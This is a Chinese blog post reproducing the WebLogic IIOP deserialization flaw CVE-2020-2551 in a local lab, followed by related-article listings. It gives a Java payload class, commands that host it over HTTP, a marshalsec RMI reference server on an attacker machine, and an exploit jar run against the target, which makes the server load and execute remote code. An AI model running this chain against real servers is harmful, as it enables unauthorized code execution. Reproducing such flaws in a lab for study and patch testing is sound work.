Weblogic IIOP反序列化漏洞(CVE-2020-2551)

最新推荐文章于 2024-04-12 21:11:37 发布
最新推荐文章于 2024-04-12 21:11:37 发布
阅读量2.1k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/112347309
版权

1.漏洞描述

       Weblogic IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

2.影响版本

  • 10.3.6.0.0  
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0

3.漏洞环境搭建

所有环境都是建立在java环境的基础上,jdk自行下载安装,本机环境jdk 1.8

1)weblogic下载链接

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

2)weblogic 10.3.6安装步骤参考链接:

https://wenku.baidu.com/view/938a7a56f5335a8102d220d0.html

3)搭建完成后,启动weblogic,浏览器输入http://127.0.0.1:7001/console/login/LoginForm.jsp

由于是在本地windows环境搭建,利用IP区分靶机和攻击机器

127.0.0.1(靶机)

192.168.231.186(攻击机器)

4.EXP

EXP下载链接:

https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取码:03vx

工具都在同一个文件夹内

import java.io.IOException;

public class exp {
	static{
		try {
			java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
		} catch (IOException e) {
			e.printStackTrace();
		}
	}
	public static void main(String[] args) {
		
	}
}

 

5.漏洞复现

1)编译生成exp.class

javac exp.java -source 1.6 -target 1.6

启一个web服务,需要与exp.class再同一个文件夹

python -m SimpleHTTPServer 80
python3 -m http.server 80

2)使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.231.186/#exp" 1099

3)执行如下命令,成功弹出计算器

java -jar weblogic_CVE_2020_2551.jar 127.0.0.1 7001 rmi://192.168.231.186:1099/exp

 

chaojixiaojingang
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic禁用IIOP协议,weblogic CVE-2020-2551漏洞修复
蕃薯耀的博客
01-27 3725
weblogic禁用IIOP协议 weblogicCVE-2020-2551漏洞修复 ================================ ©Copyright 蕃薯耀2021-01-27 https://www.cnblogs.com/fanshuyao/ 一、IIOP协议漏洞 攻击者能够利用Weblogic IIOP协议远程访问Weblogic Server服务器上的远程接口...
WebLogic CVE-2020-2551漏洞
糖小喵
05-19 1630
预备知识 主要是利用IIOP协议进行的攻击。从0开始学习复现这个洞不免又会设计到Java反序列化漏洞中那些老生常谈的名词理解,涉及到Java反序列化中的一些协议、行为、结构。 RMI、JRMP LDAP 主要充当目录服务的协议 ...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
Weblogic IIOP协议反序列化CVE-2020-2551
热门推荐
good good study
03-12 1万+
目录 一. 漏洞描述 二. 影响版本 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 一. 漏洞描述 2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。 经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类Ab...
跨越语言的艺术:Weblogic序列化漏洞IIOP协议(1)
最新发布
m0_60388216的博客
04-12 184
/ 绑定远程对象 Request消息 rebind_any方法。// 执行远程对象中的方法。
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析
whatday的专栏
07-09 5098
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 0x01 漏洞分析 从Oracle 官方的CPU公告中可以看出该漏洞存在于weblogic核心组件,影响的协议为IIOP。其实经过分析发现,该漏洞原理上类似于RMI反序列化漏洞CVE-2017-3241),和之前的T3协议所引发的一系列.
漫谈-Weblogic-CVE-2020-2551
Ms08067安全实验室
05-01 4694
背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。其中 CVE-2020-2551 漏洞,互联网中公布...
CVE-2020-2551 深入 IIOP 检测与 Non-Java(Yak) 利用
小王的储物间
03-29 514
用一些自己的理解介绍一些相关名词。
漫谈 WebLogic-CVE-2020-2551
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
01-14 1350
本文源自:https://paper.seebug.org/1149/#jdk 作者:r4v3zn@白帽汇安全研究院本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!投稿邮箱:paper@seebug.org 背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效..
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
qq_30302577的博客
04-01 7529
文章目录前言0x01 漏洞说明0x02 影响版本:0x03 Weblogic环境搭建0x04 漏洞利用0x05 漏洞修复方案1.使用 Oracle 官方安全补丁进行更新修复2.如果不依赖T3协议进行JVM通信,用户可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。0x06 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年1月15日,O...
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
锋刃科技的博客
03-06 1377
漏洞概述 攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 IIOP协议以Java接口的形式对远程对象进行访问,默认启用。 影响版本 weblogic 10.3.6 weblogic 12.1.3.0 weblogic 12.2.1.3.0 weblogic 12.2.1.4.0 环境搭建 下载地址 https://www.oracle.com/m...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-1027
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
weblogic集群配置信息,IIOP问题解决,节点配置管理
wudongfang666的专栏
11-13 388
这是没有启动节点服务器之前的图片,启动./startWeblogic.sh.后进入控制台,分别添加服务器和集群,到命令控制台启动节点服务器,如果卡在服务器名.log日志里面看下是否最后更新到IIOP这里,如果是,那么把上面红色字体加入到对应的脚本中,跳过依赖检查,然后重新启动管理和节点服务器即可。查询说是依赖包检查,我linux系统是最小安装,估计没有依赖包,加入上面文件以后,再次启动就快了。第一、创建域的时候,管理服务器,受管服务器,选择管理服务器,设置端口9001,其他默认下一步即可。
weblogic 反序列化CVE-2020-2551漏洞复现(vulfocus)
qq_40646572的博客
04-27 2056
weblogic 反序列化CVE-2020-2551漏洞是基于IIOP协议执行远程代码进行利用。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1547
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值